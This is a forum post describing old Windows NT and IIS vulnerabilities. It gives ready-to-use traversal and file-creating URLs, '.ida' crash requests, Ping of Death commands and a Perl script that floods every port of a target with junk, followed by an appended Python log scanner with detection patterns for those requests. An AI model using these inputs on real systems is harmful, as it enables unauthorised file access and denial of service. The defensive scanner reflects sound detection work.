

      汶上信息港

      Title: NT vulnerabilities and their descriptions (English)

      Author: 雜七雜八    Time: 2011-1-13 17:12
      Title: NT vulnerabilities and their descriptions (English)
      Affected systems: 4.0, IIS 1.0
      A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

      A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

      By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

      --------------------------------------------------------------------
      Affected systems: 4.0
      A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

      If the file 'target.bat' exists, the file will be truncated.

      A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.

      ----------------------------------------------------------------------
      Affected systems: 3.51, 4.0
      Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

      The following steps:

      Telnet to an NT 4.0 system on port 135
      Type about 10 characters followed by a <CR>
      Exit Telnet

      result in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

      When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

      The above also works on port 1031 (inetinfo.exe), where IIS services must be restarted.

      If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
      The following is a modified Perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT Resource Kit):

      /*begin poke code*/

      use Socket;
      use FileHandle;
      require "chat2.pl";   # chat2.pl supplies chat::open_port, chat::print and chat::close

      $systemname = $ARGV[0] && shift;   # target host name taken from the command line

      $verbose = 1;    # tell me what you're hitting
      $knownports = 1; # don't hit known problem ports
      for ($port = 0; $port < 65535; $port++)   # start at port 0 (the posted copy read $0, the script name)
      {
          # skip the ports already known to lock the host up (53, 135, 1031)
          if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
              next;
          }
          $fh = chat::open_port($systemname, $port);
          chat::print($fh, "This is about ten characters or more");
          if ($verbose) {
              print "Trying port: $port\n";
          }
          chat::close($fh);
      }

      /*end poke code*/

      Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername

      --------------------------------------------------------------------------------
      Affected systems: 4.0
      Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.

      This attack causes Dr. Watson to display an alert window and to log an error:

      "The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

      --------------------------------------------------------------------------------
      Affected systems: 3.51, 4.0
      Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as 'Ping of Death', can cause a blue screen of death on 3.51 systems:

      STOP: 0X0000001E
      KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

      -OR-

      STOP: 0x0000000A
      IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

      NT 4.0 is vulnerable sending large packets, but does not crash on receiving large packets.

      --------------------------------------------------------------------------------
      Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL http://www.example.com/...[25kb of '.']...ida, the server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).

      --------------------------------------------------------

      IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as http://www.microsoft.com/anything.ida or http://www.microsoft.com/anything.idq, a remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found'. Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server.
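As an added example, not part of the original post, the request shapes the post lists ('..\..' traversal, the '>' redirection in /scripts/, the %0A%0D control characters, the '.ida'/'.idq' probes and the very long '.ida' URL) are turned into a small detection pass over web-server log lines. The log layout, the client addresses and the 200-dot threshold for the long '.ida' case are constructed assumptions for the sample; only the patterns themselves come from the post.

```python
import re
from urllib.parse import unquote

# Indicators drawn from the NT 4.0 / IIS items in the post above; each regex
# is applied to the URL-decoded request path.
INDICATORS = [
    ("dir-traversal", re.compile(r"\.\.[\\/]|\.\.$")),
    ("output-redirect", re.compile(r"/scripts[\\/].*>", re.IGNORECASE | re.DOTALL)),
    ("crlf-in-path", re.compile(r"[\r\n]")),
    ("ida-idq-probe", re.compile(r"\.id[aq]$", re.IGNORECASE)),
]
# The post cites ~25 KB of '.' before "ida"; 200 is an assumed lower threshold
# so the constructed sample below stays short.
LONG_IDA_DOTS = re.compile(r"\.{200,}ida$", re.IGNORECASE)

def classify_request(raw_path: str) -> list[str]:
    """Names of every indicator matching one request path; decoding once
    makes %0A%0D (and %2e%2e) visible as the characters they encode."""
    path = unquote(raw_path)
    hits = [name for name, rx in INDICATORS if rx.search(path)]
    if LONG_IDA_DOTS.search(path):
        hits.append("long-ida-url")
    return hits

# Simplified "<client> <method> <path> <status>" lines: a constructed layout,
# not IIS's own W3C extended log format.
LOG_LINE = re.compile(r"^(\S+) (\S+) (\S+) (\d{3})$")

def scan_log(lines: list[str]) -> list[tuple[str, str, list[str]]]:
    """(client, path, indicators) for each line that trips an indicator."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # unparseable line: skip rather than guess
        client, _method, path, _status = m.groups()
        hits = classify_request(path)
        if hits:
            findings.append((client, path, hits))
    return findings

# Constructed sample traffic, not real log data.
SAMPLE_LOG = [
    "10.0.0.5 GET /index.htm 200",
    "10.0.0.7 GET /..\\.. 200",
    "10.0.0.7 GET /scripts/exploit.bat>c:\\target.bat 200",
    "10.0.0.9 GET /scripts/script_name%0A%0D>c:\\target.bat 200",
    "10.0.0.9 GET /anything.idq 404",
    "10.0.0.9 GET /" + "." * 300 + "ida 500",
]
```

Running scan_log(SAMPLE_LOG) flags five of the six constructed lines; the CRLF line trips both the redirect and the control-character indicators, which is the combination the post's third item describes.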




      Welcome to 汶上信息港 (http://www.vancelump.com/) Powered by Discuz! X3.5